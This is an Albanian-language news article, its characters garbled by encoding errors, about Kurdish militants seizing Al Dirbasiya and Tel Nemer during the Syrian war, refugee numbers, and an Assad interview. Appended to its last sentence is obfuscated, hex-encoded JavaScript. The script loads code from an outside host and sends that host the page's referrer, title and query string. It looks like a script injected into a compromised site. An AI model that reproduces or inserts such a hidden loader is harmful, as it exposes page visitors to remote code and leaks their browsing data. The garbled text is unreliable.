siria-war

MilitantA�t kurdA� pA�rfshihen nA� luftA�n nA� Siri

Nga konflikti i brendshA�m sirian kanA� pA�rfituar militantA�t e armatosur kurdA� tA� cilA�t kanA� marrA� nA�n kontroll sA� fundmi dy qytetet veri-lindore tA� vendit.

SiA� njofton Observatori sirian pA�r tA� drejtat e njeriut me seli nA� LondA�r, kurdA�t e armatosur morA�n kontrollin nA� Al Dirbasiya dhe Tel Nemer pas tA�rheqjes sA� forcave qeveritare nA� respektim tA� bisedimeve me opozitA�n e armatosur.

NA� kA�to dy qytete jeton njA� komunitet i konsiderueshA�m i etnisA� kurde, e ndarA� mes Irakut, Iranit dhe SirisA�. LA�vizjet separatiste tA� kurdA�ve vijojnA� prej vitesh dhe mA� aktive sA� fundmi kanA� qenA� nA� Turqi.

NdA�rkohA�, tA� premten rebelA�t morA�n kontrollin e njA� qytetit pranA� Ras al Ein nga ku kontrollojnA� njA� pikA�-kalim kufitar drejt TurqisA�. NA� zonA� u raportuan luftime tA� ashpra mes forcave besnike tA� regjimit dhe opozitA�s sA� armatosur, ndA�rsa pasojat e kA�tyre pA�rleshjeve konsiderohen katastrofike.

Mbi 32 mijA� persona mendohet se kanA� humbur jetA�n dhe mijA�ra tA� tjerA� janA� zhvendosur qA� nga nisja e konfliktit tA� brendshA�m nA� Siri. 120 mijA� refugjatA� sirianA� tA� luftA�s janA� vendosur vetA�m nA� Turqi, ndA�rsa shumA� prej tyre kanA� kapA�rcyer kufirin me JordaninA� dhe tA� tjerA� janA� nA� lA�vizje brenda vendit.

NA� njA� intervistA� pA�r televizionin rus RT, presidenti sirian, Bashar al-Assad shprehu vendosmA�rinA� pA�r tA� vijuar betejA�n, sipas tij, nA� mbrojtje tA� SirisA� dhe popullit sirian. Ai tha se do tA� mposhtA� a�?terroristA�t e financuar nga vendet perA�ndimore dhe Turqiaa�? dhe mohoi kategorikisht largimin nga vendi duke thA�nA� sea�?UnA� jam sirian! KA�tu kam lindur, kA�tu jam rritur, shtA�pia ime A�shtA� kA�tu dhe kA�tu do tA� vdesa�?.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}